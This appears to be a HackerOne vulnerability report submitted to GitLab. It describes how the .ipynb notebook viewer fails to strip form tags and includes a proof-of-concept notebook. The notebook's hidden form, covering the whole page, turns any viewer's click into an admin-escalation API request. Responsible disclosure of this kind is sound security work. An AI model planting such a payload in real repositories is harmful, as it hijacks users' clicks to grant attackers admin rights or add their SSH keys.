**[HackerOne report #1563379](https://hackerone.com/reports/1563379)** by `yvvdwf` on 2022-05-09, assigned to `GitLab Team`: [Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce) ## Report ##### Summary Hello, The santization of a .ipynb notebook viewer does not exclude `form` tag. Consequently attackers may introduce a `form` which allows to send arbitrary POST requests to the server. PUT, DELETE, PATH requests can be achieved by setting value of`_method` field. Attackers may also use `class` attribute to change the form submit button as a topmost transparent layer to intercept users' clicks. In the following example, users click anywhere on the webpage to trigger a form submit. ##### Steps to reproduce 1. In an existing project or create a new one, add a file, `notebook-test.ipynb` (you can change the basename but the `.ipynb` extension is important) with the following content: ```json { "cells": [ { "cell_type": "code", "source": [ "print(\"Hello world\")"], "outputs": [ { "data": { "text/html": [ "<form action=/api/v4/users/5212593 method=post>", "<input name=_method value=PUT type=hidden>", "<input name=admin value=true type=hidden>", "<input type=submit class='fixed-top fixed-bottom text-hide gl-font-size-42 cursor-default' value='zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'>" ] } } ] } ] } ``` 2. After committing the file, view it and click anywhere on the webpage. You will see a POST request to `/api/v4/users/5212593`. This is an example to escalate my account as Admin. ##### Impact Attackers may trick users to perform unattended actions, such as (1) add attackers to Admin or a private group, (2) add attackers' SSH key, etc. ##### Examples This example is in private mode, please tell me if you cannot access: https://gitlab.com/yvvdwf/xss/-/blob/master/notebook-form.ipynb ##### What is the current *bug* behavior? The sanitization does not exclude `form` tag ##### What is the expected *correct* behavior? The `form` tag should be excluded ##### Output of checks This bug happens on GitLab.com #### Impact Attackers may trick users to perform unattended actions, such as (1) add attackers to Admin or a private group, (2) add attackers' SSH key, etc. ## Attachments **Warning:** Attachments received through HackerOne, please exercise caution! * [Screenshot_2022-05-09_at_13.33.47.png](https://h1.sec.gitlab.net/a/3855d0b0-269a-481f-a9df-b08656938e73/Screenshot_2022-05-09_at_13.33.47.png) ## How To Reproduce Please add [reproducibility information] to this section: 1. 1. 1. [reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues